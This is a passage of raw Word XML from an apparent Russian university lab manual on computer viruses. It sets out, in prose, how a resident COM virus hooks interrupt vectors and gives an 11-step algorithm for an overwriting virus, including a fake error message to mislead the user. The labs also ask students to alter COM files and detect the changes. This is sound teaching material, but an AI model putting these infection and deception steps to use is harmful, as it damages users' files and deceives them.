        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Секция инициализации выполняет следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="660"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Получает управление при запуске зараженной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="660"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверяет, установлена ли в память резидентная часть вируса .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Восстанавливает в  памяти компьютера исходные три байта этой программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если резидентная часть не установлена, выполняются следующие де</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Отыскивается свободный блок памяти достаточного для размещ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния вируса размера .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Код вируса копируется в найденный блок памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В таблице векторов прерываний соответствующие вектора замен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ются точками входа в вирусные обработчики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выполняется переход на начало зараженной</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы (на адрес CS: 100h). После этого программа выполняе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся, как обычно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В том случае,  если резидентная часть вируса уже находится в памяти, он просто передает  управление зараженной программе.</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pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Порядок выполнения работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изменить файл (дописать в него любой исполняемый НЕ вредоно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный код с помощью разработанной программы или внесением изменения вру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ную):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Использовать программы находящиеся на сервере: «\\192.168.31.1\для студентов\Вирусы\лабораторные\программы для ЛР\».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изменить файлы NTDETECT.COM или EDIT.com одним из извес</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ных методов работы СОМ-вирусов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>без потери его работоспособности</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>продемонстрировать с помощью любого редактора (наглядно показывающего содержимое файла в шестнадцатеричном виде) внесённые измен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния путём сравнения изменённого файла с оригиналом;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>продемонстрировать процесс перехвата внесения изменения в файл любыми средствами (написанная программа, готовая программа и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>записать в папку «\\192.168.31.1\для студе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тов\Вирусы\лабораторные\для программ студентов\”Ф.И.О.”\» изменённый файл, программу (и её исходный код) вносившую изменения, наглядные р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зультаты процесса перехвата внесения изменения в файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Контрольные вопросы и задания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к занятию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>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2C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Как работает СОМ-вирус?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001223E0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001B04D8" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Какие действия осуществляются для выполнения хода лабораторной работы п.1.?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001B04D8" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B04D8">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ВОПРОСЫ И ЗАДАНИЯ ДЛЯ ЗАЩИТЫ РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Какие изменения были внесены в выбранный файл?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001223E0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Как и с помощью чего можно обнаружить программу вносящую изменение в СОМ-файлы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="127" w:name="_Toc503720806"/>
      <w:bookmarkStart w:id="128" w:name="_Toc3811333"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:lastRenderedPageBreak/>
        <w:t>Практич</w:t>
      </w:r>
      <w:r>
        <w:t>еское занятие 13</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Изучение работы вируса, замещающего программный код</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> изучить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">работу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вируса, замещающего программный код.</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Алгоритм работы вирусов, замещающих программный код: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Открыть файл, из которого вирус получил управление.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Считать в буфер код вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Закрыть файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Искать по маске подходящий для заражения файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. Если файлов больше не найдено, перейти к пункту 11.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. Открыть найденный файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7. Проверить, не заражен ли найденный файл этим вирусом .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8. Если файл заражен, перейти к пункту 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9. Записать в начало файла код вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10. Закрыть файл (по желанию можно заразить от одного до всех файлов в каталоге или на диске).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11. Выдать на экран какое-либо сообщение об ошибке – например, “Abnormal program termination” или “Not enough memory” - пусть пользователь не слишком удивляется тому, что программа не запустилась.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
